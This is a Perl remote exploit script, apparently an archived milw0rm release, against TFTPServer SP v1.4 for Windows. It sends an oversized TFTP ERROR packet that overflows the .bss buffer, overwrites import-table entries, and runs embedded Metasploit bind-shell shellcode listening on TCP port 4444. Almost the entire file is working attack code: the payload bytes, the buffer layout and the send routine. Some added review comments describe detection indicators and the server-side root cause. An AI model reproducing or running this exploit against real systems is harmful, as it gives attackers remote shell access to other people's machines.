#!/usr/bin/perl

#	TFTPServer SP v1.4 for Windows remote .bss overflow exploit
#	The Service or the RunStandAlone version.
#	URL: http://sourceforge.net/projects/tftp-server/
#
#	Author:		tix or tixxDZ	<tixxdz@gmail.com>
#	Date:		07/05/2008
#
#	Tested on Windows XP SP2 French not patched
#
#	TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
#	Other versions may also be vulnerable.
#
#	TFTPServer follows RFC 1350 for Error packets; a lot of other
#		TFTP servers don't.
#	TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
#	BUFFER is at 0041B3AB in the .bss section.
#	This exploit will overwrite the whole .bss section and part of the .idata section
#	to patch function addresses in the IAT.
#	
#	For the TFTPServer Service we will patch the time() function
#	For the TFTPServer StandAlone program we will patch the printf() function
#
#	BUFFER = NOPS + SHELLCODE + RET
#	we will put and execute our shellcode in the .idata section, .idata => RWE.

use strict;
use IO::Socket::INET;

# Command line: <target> is mandatory, <type> is optional.
# A missing (or false, e.g. "0") first argument prints the usage text and aborts.
my $target = shift;
unless ($target) {
	die "Usage: $0 <target> <type>\n <type> : type of the program\n"
	  . "\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
}

# <type> falls back to 's' (service build) when no second argument is given.
my $type = 's';
$type = shift if defined $ARGV[0];

# Opaque payload bytes; this script only concatenates them into the datagram
# and never interprets them. The generator comment below describes the payload
# as a Windows bind shell on TCP port 4444.
# NOTE(review): for defenders, an unexpected listener on TCP/4444 owned by the
# TFTP server process would be a host-side indicator that this payload ran --
# confirm against the actual bytes before relying on the label.
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";

# Builds the body that follows the 2-byte opcode in the datagram: filler,
# then $shellcode, then the 4-byte $RET value.
#
# List assignment with a single right-hand value: $RET receives the 4 bytes,
# while $buffer is only declared here (undef) and is filled in by one of the
# two branches below.
#
# NOTE(review): for defenders, the root cause described in the file header is
# that the server accepts an error message far longer than its .bss buffer;
# the fix belongs in the server, presumably a length bound on the copy of the
# error message (the server code is not shown here). The header also states
# that .idata is mapped RWE in this build, i.e. the overwritten import table
# sits in memory that is both writable and executable.
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section

# The match is unanchored and case-insensitive: any <type> containing "p"
# selects the stand-alone layout, everything else the service layout.
if ($type =~ /p/i) {
	#	"\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
	#	---------------------------------------------------------------------------
	#	0040EB50  -FF25 60034200    JMP DWORD PTR DS:[<&msvcrt.printf>]
	#	---------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
	
	# `x` binds tighter than `.`, so only the "\x90" filler is repeated.
	# 19907 filler + 500 ($shellcode, per its generator comment) + 4 ($RET)
	# = 20411 bytes, the figure quoted above.
	$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
	#	"\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
	#	------------------------------------------------------------------------
	#	0040EB60  -FF25 90034200    JMP DWORD PTR DS:[<&msvcrt.time>]
	#	------------------------------------------------------------------------
	
	print STDOUT "Exploiting TFTPServer Service program\n";

	# Same layout as the other branch with a longer filler:
	# 19955 + 500 + 4 = 20459 bytes, the figure quoted above.
	$buffer = "\x90" x 19955 . $shellcode . $RET;
}

# Sends one UDP datagram to the TFTP port (69) and exits.
#
# What this looks like on the wire, for detection purposes:
#   - The datagram starts with opcode 00 05 (ERROR). RFC 1350 places a 2-byte
#     ErrorCode after the opcode (codes 0-7 are defined); here those two bytes
#     are simply the first bytes of $buffer, so the field holds 0x9090.
#   - The payload is roughly 20 KB, while RFC 1350 data packets top out at
#     516 bytes. On a standard Ethernet MTU it will be IP-fragmented, so a
#     sensor needs fragment reassembly to see the whole message.
#   - RFC 1350 transfers start with a read or write request on port 69, so an
#     ERROR packet arriving there as the first datagram is itself unusual.
#
# The return value of send() is not checked: "done." only means the call was
# made, not that the datagram was delivered or had any effect.
my @peer = (
	PeerAddr => $target,
	PeerPort => 69,
	Proto    => 'udp',
);

my $sock = IO::Socket::INET->new(@peer)
	or die "error: $!\n";

my $datagram = "\x00\x05" . $buffer;
$sock->send($datagram, 0);

print STDOUT "done.\n";
exit 0;

# milw0rm.com [2008-05-08]
